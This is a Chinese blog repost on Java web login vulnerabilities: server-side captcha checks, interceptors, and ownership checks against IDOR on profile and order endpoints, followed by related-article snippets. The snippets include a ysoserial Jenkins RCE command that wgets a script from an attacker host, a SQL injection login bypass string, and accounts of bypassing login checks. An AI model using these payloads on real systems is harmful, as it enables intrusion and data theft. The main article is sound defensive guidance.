【Java】系统漏洞:关于用户登录后操作的注意事项

最新推荐文章于 2024-09-30 09:09:52 发布
最新推荐文章于 2024-09-30 09:09:52 发布
阅读量113 收藏
点赞数
文章标签: 数据库 java
原文链接:http://www.cnblogs.com/jianyixjdm/p/java_login_bug_01.html
版权

项目背景:

SpringMVC + Mybatis  + MySql数据库(javaWeb项目开发)

相关模块:登录,个人详细信息修改,订单详情查询

相关漏洞介绍:

  1.登录的验证码:登录的验证码一定要在后台做验证,如果只是前台验证验证码后,后台未验证,可能会发生第一次验证验证码后,通过工具绕过验证码进行暴力破解;

  2.拦截器:要对登录后的如个人信息操作的接口名称要使用/user或者/admin进行拦截,如用户未登录,将自动跳转至登录页面;

  3.个人详细信息修改:用户的信息要存放在session里面,如用户的id,这样进行个人信息修改的时候,如果是免密接口(即修改信息不需要密码),修改账号信息的时候,一定不要直接传用户的id来做唯一的标识,使用用户的关键性信息的时候,可以从session获取当前登录用户的信息,防止如账户为3000001的用户登录后修改账户3000002的用户的个人信息;

  4.订单详情接口:如果是查询用户的订单详情,只通过订单id进行查询的话,即使接口名加了/user,拦截了未登录的用户,也有可能发生其他用户登录后可以查询到非本人订单的详情信息。对于此种情况,一定要在查询订单详情前,验证此订单是当前登录用户的个人订单,即验证session中的id与此订单的创建人的id一致;防止信息的泄露;

(备注:以上漏洞真实发生过,发出来希望其他新人引以为戒,也希望能和更多的人一起交流开发中遇到的问题)

 

转载于:https://www.cnblogs.com/jianyixjdm/p/java_login_bug_01.html

weixin_30394333
关注
java登录考虑哪些_java 安全方面的考虑-简单
weixin_39807352的博客
02-25 155
参考 深入理解JVM1 双亲委派模型(1)防止不可靠的代用自己的版本替代可信任的类。(2)运行时包的概念:同一个类装载的、属于同一个包的、多个类型的集合。加载java.lang.Virus这个非法的类,不能访问java.lang包中的API。2 class文件验证器第一趟在类被装载的时候进行,检查内部结构,保证可被编译。第二趟在连接过程中进行,语义检查,方法描述符符合特定字符串。第三趟在连接过程...
JavaWeb-用户登录实现V2与踩坑点
Darren的博客
07-23 501
文章目录1 实现代1.1 思路1.2 login.html1.3 login_result.jsp1.4 invalidate_session.jsp2 注意点2.1 不能在javascript标签中通过jsp进行session失效操作2.2 表单数据接收2.3 使用JSTL操作数据库 1 实现代 实现要求: 前面我们实现了用户登录功能,当时我们要求用户登录成功后,跳转到 success.html 页面,现在需要做需求迭代,用户登录成功后,要求跳转到 success.jsp 页面,这个页面展示登录成功
【Web实战】记一次攻防实战绕过登录机制进入后台获取大量敏感数据
2301_80127209的博客
11-15 1637
某省攻防实战。通过多层绕过。成功不要密拿下一个后台。包括各个学校账号密,等相关敏感信息。为后续打下坚实基础。
找回机制-修改返回状态值+找回密重定向
xiaoheizi的博客
07-05 113
右键选择Do intercept----response to this request模块(接收当前数据包的返回包),记住正确返回包的返回状态值:{"code":200,"data":"18313278106","msg":""}查看数据库表,发现新注册的用户repswcode值依然是y,xhz用户和两个账号的区别就是进行过找回密。福利期货再次点击忘记密,随意输入错误验证,抓取忘记密的数据包。
逻辑漏洞之修改响应包绕过登录校验
zhangge3663的博客
03-13 5432
逻辑漏洞是由于程序逻辑不严或逻辑太复杂,导致被***者利用,从而通过篡改相关数据来达到自己的目的,如绕过登录校验等! 实践操作 简单原理介绍   (这里只对本次实践原理的一个简单介绍)由于对登录的账号及口令校验存在逻辑缺陷,或再次使用服务器端返回的相关参数作为最终登录凭证,导致可绕过登录限制,如服务器返回一个flag参数作为登录是否成功的标准,但是由于代最后登录是否成功是通过获取这个fla...
pwn_jenkins:有关攻击Jenkins服务器的注意事项
05-12
java -jar ysoserial-master.jar CommonsCollections1 ' wget myip:myport -O /tmp/a.sh ' > payload.out ./jenkins_rce.py jenkins_ip jenkins_port payload.out 身份验证/ ACL绕过(CVE-2018-1000861,Jenkins &lt...
java-reflection:Java 反射简介
07-08
9. **注意事项** - 使用反射时需谨慎,避免对性能造成严重影响。 - 对于私有成员的访问,可能需要`setAccessible(true)`来解除保护,但这可能导致安全漏洞。 总结,Java反射机制为程序员提供了强大的能力,可以在...
Java字节数组打印:生产环境调试与注意事项
!...打印字节数组并非简单的输出操作,它涉及到字符编的转换,以及内存中数据的格式化。本章节将概述字节数组打印的重要性,并且为读者提供接下来章节的理论和实践的基础。我们将会看到,尽管Jav
深入剖析Java序列化:挑战复杂的面试题与详细解析
06-14
10. **序列化问题与注意事项**: - 版本不一致:确保`serialVersionUID`正确。 - 安全性:避免序列化敏感信息,限制序列化权限。 - 性能:谨慎使用默认序列化,避免过多对象复制。 11. **安全漏洞防范**: - ...
登录的一些注意事项(以java为例)
less_cold的博客
10-13 1356
登录这件事情,其实最基本的思路就是: 设置一个用户名,一个密,一个登录按钮 通过ajax把用户名和密,传给后台(controller等)进行判断,从数据库中读出所有的用户名和密进行判断即可。 在html中有一种form表单,值得学习一下, /j_spring_security_check" method="post">
java 用户登录验证_Java-用户登录验证案例
weixin_32060735的博客
02-15 2109
用户登录验证1.案例需求:1.访问带有验证登录页面login.jsp2.用户输入用户名,密以及验证* 如果用户名和密输入有误,跳转登录页面,提示:用户名或密错误* 如果验证输入有误,跳转登录页面,提示:验证错误* 如果全部输入正确,则跳转到主页success.jsp,显示:用户名,欢迎您代如下login.jsploginwindow.onload=function () {doc...
java开发中遇到的Bug(持续更新中)
Ays的博客
02-05 6517
1.Error creating bean with name 'XXX': Injection of autowired dependencies: 错误原因:实体类中没有@Component(" ")注解 解决方法:在相应的实体类中添加@Component(" ")注解 2.空指针异常: 错误原因:没有@Autowired实例化注解 解决方法:添加@Autowired实例化注解 3.E...
解决登录bug
weixin_46683645的博客
09-15 682
防止SQL注入 什么叫防止SQL注入,现在我们先来看一段例子: 登录系统 正常情况输入用户名 lxy 密 111 select * from users where username = ‘lxy’ and password=‘111’ 可以登录 非正常情况 例如用户 输入 ’ or 1=1 – select * from users where username = ‘’ or 1=1 --’ and password=‘123’ 也可以登录 原因:因为我们输入账户密之后,系统会自动给我们输入的内容
Java异常处理知识点和异常链机制
Tyloo_wdnmd的博客
12-27 356
Java异常处理知识点和异常链机制 异常处理是程序设计中一个非常重要的方面,毕竟人无完人,不可能永不犯错,程序中有异常是很正常的, Java语言在设计的当初就考虑到这些问题,提出异常处理的框架的方案,下面是我对Java异常知识和异常链的一个总结。 一、Java异常的基础知识 异常是程序中的一些错误,但并不是所有的错误都是异常,并且错误有时候是可以避免的。有些异常需要做处理,有些则不需要捕获处理,在...
java用户禁用权限_1.29.0权限申请用户禁止权限后,无法打开系统权限设置页面...
weixin_33328213的博客
02-24 506
描述 Bug设备权限申请阶段,如果用户拒绝了,再次请求用户权限时,用户无法跳转系统权限设置页面相关代PermissionUtils.permission(permission).rationale(new PermissionUtils.OnRationaleListener() {@Overridepublic void rationale(UtilsTransActivity activit...
java实现用户登录异常统计、锁定及解锁功能
aw277866304的博客
01-21 3556
java实现用户登录异常统计、锁定及解锁功能
MySQL之复合查询与内外连接
最新发布
zdlynj的博客
09-30 1214
前面我们讲解的mysql表的查询都是对一张表进行查询,即数据的查询都是在某一时刻对一个表进行操作的。而在实际开发中,我们往往还需要对多个表同时进行查询。我们这里使用的测试表,为雇员信息表(来自Oracle 9i的经典测试表):EMP员工表,DEPT部门表,SALGRADE工资等级表。
点评项目-2-完善注册登录业务
m0_75138009的博客
09-29 574
需要处理的业务:在网页发送 /user/code 路径下的 post 请求后,我们需要检验手机号后,向合法的手机号发送一个随机生成的电话号。
J#浏览器控件:Java小程序迁移与安全注意事项
虽然J#浏览器控件提供了一种方式将Java小程序迁移到.NET环境,但可能涉及到的安全漏洞和兼容性问题需要仔细评估和处理。 5. **调试**:在Visual Studio .NET中调试升级后的项目是必要的,以确保代的正确性和性能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值